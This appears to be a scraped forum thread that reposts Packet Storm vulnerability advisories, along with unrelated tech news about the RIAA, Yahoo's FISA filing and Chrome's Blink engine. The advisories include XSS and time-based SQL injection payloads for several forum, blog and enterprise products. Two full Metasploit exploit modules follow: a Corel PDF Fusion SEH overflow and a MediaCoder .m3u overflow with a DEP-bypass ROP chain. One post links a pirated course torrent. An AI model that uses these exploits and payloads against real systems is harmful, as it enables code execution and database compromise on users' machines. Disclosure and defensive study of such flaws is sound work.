Description : MintBoard version 0.3 suffers from cross site scripting vulnerabilities Author : Canberk BOLAT Source : MintBoard 0.3 Cross Site Scripting ? Packet Storm Code : Information -------------------- Name : XSS Vulnerabilities in MintBoard Software : MintBoard 0.3 and possibly below. Vendor Homepage : http://www.mintboard.com Vulnerability Type : Cross-Site Scripting Severity : Medium Researcher : Canberk Bolat Advisory Reference : NS-13-001 Description -------------------- Mintboard is a forum software who aims to do less and do it better. An attempt to say goodbye to the bloat found in forum software. Details -------------------- MintBoard is affected by XSS vulnerabilities in version 0.3. http://example.com/?login=3 (POST: name) http://example.com/?login=3 (POST: pass) http://example.com/?signup=3 (POST: name) http://example.com/?signup=3 (POST: pass) You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here: Cross-site Scripting (XSS): https://www.mavitunasecurity.com/xss-vulnerabilities-in-mintboard/ Solution -------------------- - Advisory Timeline -------------------- 06/12/2012 - First contact 10/07/2013 - Advisory Released Credits -------------------- It has been discovered on testing of Netsparker, Web Application Security Scanner. References -------------------- Vendor Url / Patch : MSL Advisory Link : https://www.mavitunasecurity.com/xss-vulnerabilities-in-mintboard/ Netsparker Advisories : https://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker -------------------- Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. -- Netsparker Advisories, <advisories@mavitunasecurity.com> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Description : MiniBB version 3.0.0 suffers from cross site scripting and remote SQL injection vulnerabilities. Author : Omar Kurt Source : MiniBB 3.0.0 Cross Site Scripting / SQL Injection ? Packet Storm Code : Information -------------------- Name : XSS and SQL Injection Vulnerabilities in MiniBB Software : MiniBB 3.0.0 and possibly below. Vendor Homepage : http://www.minibb.com Vulnerability Type : Cross-Site Scripting and SQL Injection Severity : Critical Researcher : Omar Kurt Advisory Reference : NS-13-002 Description -------------------- miniBB® is a standalone, open source program for building your own Internet forum, and it's free to download. Comparing to the other forum software available on the market, miniBB just brings what it's created for: an easy, lite, and speedy quick forum. Details -------------------- MiniBB is affected by XSS and SQL Injection vulnerabilities in version 3.0.0. XSS: http://example.com/bb_admin.php (GET - params: forum_name, forum_group, forum_icon, whatus, forum_desc) SQL Injection: http://example.com/bb_admin.php?action=searchusers2&searchus=id&whatus='+(SELECT1 FROM (SELECT SLEEP(25))A)+' You can read the full article about Cross-Site Scripting and SQL Injection vulnerabilities from here : Cross-site Scripting (XSS): https://www.mavitunasecurity.com/crosssite-scripting-xss/ SQL Injection: https://www.mavitunasecurity.com/sql-injection/ Solution -------------------- - Advisory Timeline -------------------- 26/02/2013 - First contact 15/03/2013 - Fix & New MiniBB version released 11/07/2013 - Advisory released Credits -------------------- It has been discovered on testing of Netsparker Web Application Security Scanner. References -------------------- Vendor Url / Patch : http://www.minibb.com/forums/news-9/minibb-3.0.1-released-stable-fixed-secured-dedicated-6059.html MSL Advisory Link : https://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-minibb/ Netsparker Advisories : https://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker -------------------- Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. -- Netsparker Advisories, <advisories@mavitunasecurity.com> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Description : Serendipity version 1.6.2 suffers from multiple cross site scripting vulnerabilities Author : Omar Kurt Source : Serendipity 1.6.2 Cross Site Scripting ? Packet Storm Code : Information -------------------- Name : XSS Vulnerabilities in Serendipity Software : Serendipity 1.6.2 and possibly below. Vendor Homepage : http://www.s9y.org/ Vulnerability Type : Cross-Site Scripting Severity : Medium Researcher : Omar Kurt Advisory Reference : NS-13-003 Description -------------------- Serendipity is a PHP-powered weblog application which gives the user an easy way to maintain an online diary, weblog or even a complete homepage. While the default package is designed for the casual blogger, Serendipity offers a flexible, expandable and easy-to-use framework with the power for professional applications. Details -------------------- Serendipity is affected by XSS vulnerabilities in version 1.6.2. http://example.com/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtmltarget%5D=%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=208.100.0.117&serendipity%5BadminAction%5D=208.100.0.117&serendipity%5BadminModule%5D=208.100.0.117&serendipity%5Bstep%5D=default&serendipity%5Bonly_path%5D=208.100.0.117 You can read the full article about Cross-Site Scripting from here : http://www.mavitunasecurity.com/crosssite-scripting-xss/ Solution -------------------- The vendor fixed this vulnerability in the new version. Please see the references. Advisory Timeline -------------------- 26/02/2013 - First contact 04/03/2013 - Sent the details 10/07/2013 - Advisory released Credits -------------------- It has been discovered on testing of Netsparker, Web Application Security Scanner - http://www.mavitunasecurity.com/netsparker/. References -------------------- Vendor Url / Patch : - MSL Advisory Link : https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/ Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/ About Netsparker -------------------- Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner. -- Netsparker Advisories, <advisories@mavitunasecurity.com> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Description : McAfee ePO version 4.6.6 Build 176 suffers from cross site scripting and remote SQL injection vulnerabilities. Author : Nuri Fattah Source : McAfee ePO 4.6.6 Cross Site Scripting / SQL Injection ? Packet Storm Code : Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC Multiple vulnerabilities in McAfee ePO 4.6.6 Affected Product: McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions Timeline: 08 June 2013 - Vulnerability found 12 June 2013 - Vendor informed 12 June 2013 - Vendor replied/confirmed & opened service ticket 12 July 2013 - Vendor responded with dates for solutions Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int) CVE: To be assigned NCIRC ID: NCIRC-2013127-01 Description: Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL injection were identified in the latest version of McAfee ePO (4.6.6). All identified vulnerabilities were discovered post authentication. Vulnerability Details: 1. SQL injection a. GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitf or%20delay'0%3a0%3a20'-- &index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax Mode=standard HTTP/1.1 b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer &uid=1;%20WAITFOR%20DELAY%20'0:0:0';-- &datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory %3Aquery.2&index=0 HTTP/1.1 McAfee Solution: Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013. Item "b" has been addressed per Security Bulletin SB10043. (https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043) 2. Reflected XSS a. POST /core/loadDisplayType.do HTTP/1.1=20 displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard b. POST /console/createDashboardContainer.do HTTP/1.1 displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard c. POST /console/createDashboardContainer.do HTTP/1.1 elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30& width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1 e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1 f. GET /ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&orion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><script>alert(30629)</script> HTTP/1.1 g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1 h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script>&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>"'><script>alert(30565)</script> HTTP/1.1 McAfee Solution: Each of these items will be addressed in ePO 4.6.7 due out in late Q3 2013. Nuri FATTAH CTR NATO Communications and Information Agency Engineering & Vulnerability Management Sections NATO Information Assurance Technical Centre SHAPE, 7010 Mons, Belgium T: +32 6544 6140 F: +32 6544 5414 SHAPE NCN: 254 6140 E: nuri.fattah@ncirc.nato.int W: www.ncirc.nato.int

Description : BMC Service Desk Express (SDE) version 10.2.1.95 suffers from cross site scripting and remote SQL injection vulnerabilities. Author : Nuri Fattah Source : BMC Service Desk Express 10.2.1.95 XSS / SQL Injection ? Packet Storm Code : Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC Multiple vulnerabilities in BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95 Affected Product: BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95 Timeline: 07 June 2013 - Vulnerability found 12 June 2013 - Vendor informed 17 June 2013 - Vendor replied/confirmed & opened service ticket Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int) CVE: To be assigned NCIRC ID: NCIRC-2013127-02 Description: Multiple vulnerabilities, including Cross-Site Scripting(XSS) and SQL injection were identified in the latest version of BMC SERVICE DESK EXPRESS Vulnerability Details: 1. SQL injection a. /SDE/DashBoardGUI.aspx vuln parameter: [ASPSESSIONIDASSRATTQ cookie] b. /SDE/DashBoardGUI.aspx vuln parameter: [TABLE_WIDGET_1 cookie] c. /SDE/DashBoardGUI.aspx vuln parameter: [TABLE_WIDGET_2 cookie] d. SDE/DashBoardGUI.aspx vuln parameter: [browserDateTimeInfo cookie] e. /SDE/DashBoardGUI.aspx vuln parameter: [browserNumberInfo cookie] f. /SDE/login.aspx vuln parameter: [UID] 2. Reflected XSS a. /SDE/QV_admin.aspx vuln parameter: [SelTab] b. /SDE/QV_grid.aspx vuln parameter: [CallBack] c. /SDE/commonhelp.aspx vuln parameter: [HelpPage] example: GET /SDE/QV_grid.aspx?QuerySeq=1068&CondVal=1%40V1%40ADMINISTRATION%401&Call Back=parent.parent.frames.TmInputs.callBack(doGridDataCallBack.arguments [0]);</script><script>alert(99817)</script>&ViewType=g&bRefresh= HTTP/1.1 Solution: No Solution has yet been provided. Please contact the vendor.

Description : This Metasploit module exploits a stack-based buffer overflow vulnerability in version 1.11 of Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry names. In order for the payload to be executed, an attacker must convince the target user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the attacker can execute arbitrary code as the target user. Author : juan vazquez, Kaveh Ghaemmaghami Source : Corel PDF Fusion Stack Buffer Overflow ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex/zip' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Corel PDF Fusion Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in version 1.11 of Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry names. In order for the payload to be executed, an attacker must convince the target user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the attacker can execute arbitrary code as the target user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kaveh Ghaemmaghami', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-3248' ], [ 'OSVDB', '94933' ], [ 'BID', '61010' ], [ 'URL', 'http://secunia.com/advisories/52707/' ] ], 'Platform' => [ 'win' ], 'Payload' => { 'DisableNops' => true, 'Space' => 4000 }, 'Targets' => [ # Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00) # CorelFusion.exe 2.6.2.0 # ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates [ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ] ], 'DisclosureDate' => 'Jul 08 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps']) ], self.class) end def exploit template = [ "[Content_Types].xml", "_rels/.rels", "docProps/thumbnail.jpeg", "docProps/core.xml", "FixedDocSeq.fdseq", "Documents/1/Pages/_rels/1.fpage.rels", "Documents/1/_rels/FixedDoc.fdoc.rels", "Documents/1/FixedDoc.fdoc", "Documents/1/Structure/Fragments/1.frag", "Documents/1/Structure/DocStructure.struct", "Documents/1/Pages/1.fpage", ] xps = Rex::Zip::Archive.new template.each do |k| xps.add_file(k, rand_text_alpha(10 + rand(20))) end resources_length = "Resources/".length sploit = "Resources/" sploit << payload.encoded sploit << rand_text(target['Offset'] - sploit.length) sploit << generate_seh_record(target.ret) sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length sploit << rand_text(1500) # Trigger exception xps.add_file(sploit, rand_text_alpha(10 + rand(20))) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(xps.pack) end end

Description : This Metasploit module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution under the context of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder runs with DEP. This Metasploit module has been tested successfully on MediaCoder 0.8.21.5539 to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0. Author : metacom Source : MediaCoder .M3U Buffer Overflow ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'MediaCoder .M3U Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution under the context of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539 to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom', # Vulnerability discovery and PoC 'modpr0be <modpr0be[at]spentera.com>', # Metasploit module 'otoy <otoy[at]spentera.com>' # Metasploit module ], 'References' => [ [ 'OSVDB', '94522' ], [ 'EDB', '26403' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'seh' }, 'Platform' => 'win', 'Payload' => { 'Space' => 1200, 'BadChars' => "\x00\x5c\x40\x0d\x0a", 'DisableNops' => true, 'StackAdjustment' => -3500 }, 'Targets' => [ [ 'MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0', { # stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll) 'Ret' => 0x6afd4435, 'Offset' => 849, 'Max' => 5000 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jun 24 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) ], self.class) end def junk(n=1) return [rand_text_alpha(4).unpack("L")[0]] * n end def nops(rop=false, n=1) return rop ? [0x6ab16202] * n : [0x90909090] * n end def exploit # fixed rop from mona.py rop_gadgets = [ nops(true,35), # ROP NOP 0x100482ff, # POP EAX # POP EBP # RETN [jpeg.dll] 0xffffffc0, # negate will become 0x00000040 junk, 0x66d9d9ba, # NEG EAX # RETN [avutil-52.dll] 0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN [swscale-2.dll] junk(15), # reserve more junk for add esp,2c 0x1004cc03, # POP ECX # RETN [jpeg.dll] 0x6ab561b0, # ptr to &VirtualProtect() [IAT swscale-2.dll] 0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN [avutil-52.dll] 0x6ab19780, # XCHG EAX,ESI # RETN [swscale-2.dll] 0x66d929f5, # POP EAX # POP EBX # RETN [jpeg.dll] 0xfffffcc0, # negate will become 0x0000033f junk, 0x6ab3c65a, # NEG EAX # RETN [postproc-52.dll] 0x1004cc03, # POP ECX # RETN [jpeg.dll] 0xffffffff, # 0x660166e9, # INC ECX # SUB AL,0EB # RETN [libiconv-2.dll] 0x66d8ae48, # XCHG ECX,EBX # RETN [avutil-52.dll] 0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN [jpeg.dll] 0x6ab3d688, # POP ECX # RETN [jpeg.dll] 0x6ab4ead0, # Writable address [avutil-52.dll] 0x100444e3, # POP EDI # RETN [swscale-2.dll] nops(true), # ROP NOP [swscale-2.dll] 0x100482ff, # POP EAX # POP EBP # RETN [jpeg.dll] nops, # Regular NOPs 0x6ab01c06, # PUSH ESP# RETN [swscale-2.dll] 0x6ab28dda, # PUSHAD # RETN [swscale-2.dll] ].flatten.pack("V*") sploit = "http://" sploit << rand_text(target['Offset']) sploit << [target.ret].pack('V') sploit << rop_gadgets sploit << make_nops(16) sploit << payload.encoded sploit << rand_text(target['Max']-sploit.length) file_create(sploit) end end

Intr-un minut nu mai merge niciunul.

Mai simplu : http://isohunt.com/torrent_details/371592937/Certified+Ethical+Hacker+v7?tab=summary

Jammie Thomas-Rasset testifies in her first civil trial in 2007, while U.S. District Judge Michael Davis watches from the bench. Illustration: Cate Whittemore/Wired Did you hear the one about the world’s most infamous music file-sharer being asked to publicly extol the virtues of the Recording Industry Association of America’s anti-piracy platform? The RIAA is suggesting Jammie Thomas-Rasset do just that. In exchange, the recording studios’ lobbying and litigation arm would reduce a $222,000 jury verdict the Supreme Court let stand in May — her punishment for sharing 24 songs on the now-defunct file-sharing service Kazaa. However, the 36-year-old mother of four and the nation’s first file-sharer to challenge a Recording Industry Association of America lawsuit, said she would rather go bankrupt. “I’m not doing it,” the Minnesota woman said in a telephone interview today. She said she earns a small salary working in the natural resources department of a local Native American tribe. The RIAA’s overture, which did not specify how much it would relieve of the debt, comes four months after the Supreme Court declined (.pdf) to review Thomas-Rasset’s petition claiming the damages award was unconstitutionally excessive and was not rationally related to the harm she caused the music labels. In a statement, RIAA spokesman Jonathan Lamy said : Thomas-Rasset’s attorney, Michael Wilson, said in a telephone interview today that “the record industry was offering a kind of a public statement as a possible supplement so she wouldn’t have to pay the full amount.” He said the RIAA offered “no specifics.” “It was kind of a general idea, nothing concrete,” Wilson added. “I would assume it would be something along those lines: anti-piracy and culpability.” Wilson said that, because “she is pretty opposed” to making a statement, he is exploring the possibility that Thomas-Rasset file for bankruptcy protection to keep the damages award at bay. This wouldn’t be the first time the RIAA has sought a public-service announcement from a file-sharer. In 2009, a Los Angeles man was sentenced to two months’ home confinement and a year of probation for uploading nine unreleased tracks of Guns N’ Roses’ Chinese Democracy to his music site. Federal prosecutors initially sought six months of prison, but Cogill got no time after agreeing to do an RIAA public service announcement that would scare future file sharers straight. But the RIAA never made Kevin Cogill follow through. Meantime, Thomas-Rasset’s legal odyssey dates to 2007. The RIAA’s litigation had a tortuous history involving a mistrial and three separate verdicts for the same offense — $222,000, $1.92 million and $1.5 million. Out of the thousands who were sued, the only other file-sharer to challenge an RIAA lawsuit at trial was Joel Tenenbaum, then a Massachusetts college student, whose case followed Thomas-Rasset’s. A federal appeals court last month upheld a Boston federal jury’s award of $675,000 against him for sharing 30 songs. Most of the thousands of RIAA file-sharing cases against individuals have settled out of court for a few thousand dollars. In 2008, the RIAA ceased a five-year campaign it had launched to sue individual file sharers and, with the Motion Picture Association of America, has since convinced internet service providers to begin taking punitive action against copyright scofflaws. Sursa Wired.Com

Yahoo! has launched a fresh bid to reveal the top secret workings of the US surveillance state and prove it did not voluntarily hand over its customer's data to NSA spooks. The Purple Palace wants to lift a seal on a 2008 court case in which the firm "strenuously objected" to the National Security Agency's requests for its customers' info. Yahoo! was overruled and the US government was subsequently given powers to harvest information from major internet firms. Yahoo! outlined its request in a filing with the Foreign Intelligence Surveillance Act (FISA) court, the Mercury News reports. Until last month, when news broke about the NSA's top-secret PRISM surveillance programme, Yahoo! was not even allowed to say it was a party in the court case, which was kept classified under the Foreign Intelligence Surveillance Act. If details of the court case are released, it would shed light on the workings of the NSA and the methods they use to spy on foreign nationals as well as American citizens. "Release of this Court's decision and the parties' briefing is necessary to inform the growing public debate about how this Court considers and examines the Government's use of directives," Yahoo! attorneys Marc Zwillinger and Jacob Sommer wrote in a filing to the FISA court. "Courts have long recognized the public has a right to access court records." Yahoo! has already released details of exactly how many times spooks made data requests, but it is not allowed to say exactly how many were made under secret FISA legislation, which allows spooks to ask for personal data. Its most recent court filing is the most explicit assault any internet firm has made on the secrecy surrounding the FISA courts, according to Alex Abdo, an American Civil Liberties Union attorney. He told Mercury News: "This is the first time we've seen one of these companies making this broad an argument in favor of transparency in the FISA court." The existence of the NSA's PRISM surveillance system was first revealed by IT boffin-turned-deepthroat Edward Snowden, who is still on the run from US authorities. He revealed spies could snoop on users of most of the world's common communications services through metadata from online communications and mobile phone call records. The public still does not know the full details of NSA spying, something all of the big internet firms want to change. Facebook, Microsoft and Google all want to reassure customers around the world that they didn't simply allows spooks to have unfettered access to their servers, but only responded to specific requests. "Revealing what went on in the court is critical to having a democracy," Jennifer Stisa Granick, from Stanford University law school's Centre for Internet and Society, told the paper. "If Yahoo is successful in revealing what the court did and why, then we will know more about the laws our government is purportedly operating under, which sadly we don't currently know." ® Sursa TheRegister.co.uk

Blink, the browser rendering engine Google summoned into existence after becoming disgruntled with progress on the Apple-led Webkit, has made its debut in Windows and Mac OS, after having made its way to Linux last month. The engine is embedded in Chrome 28, available now in Chrome's stable channel. Google revealed plans to create Blink back in April, when it declared that more rendering engines would mean more innovation. Few swallowed that explanation, as Google has many reasons to direct development of as much of Chrome's innards as it can in order to ensure the browser plays nicely with its myriad services. As we noted at that time, the Chocolate Factory was alread unhappy with some aspects of Webkit. That meant “Chrome never used WebKit in quite the same way that Safari did. For example, Chrome ignored WebKit's JavaScriptCore component in favor of Google's homegrown JavaScript engine, V8. It also handled multiple browser processes in a significantly different way than Safari did.” Google hinted at “major architectural changes” in Blink, which as a fork of WebKit started with the same code base. Few changes are apparent to users in Chrome 28, which Vulture South used to publish this story without being required to do anything new. The most visible changes are a new notifications centre that runs in the Windows and Chrome OS versions of the browser. Vulture South's Mac-happy office hasn't checked that out, but did spot the rather different-looking error message below that, when we clicked on the 'More' button, produced the full text of Chrome's "ERR_NAME_NOT_RESOLVED" notification. The update process may not, however, be entirely hassle-free: once we learned of Chrome 28's existence, Chrome 27 reported it could find no updates. A discrete installation of Chrome 28 was therefore necessary to bring you this article. ® Sursa TheRegister.co.uk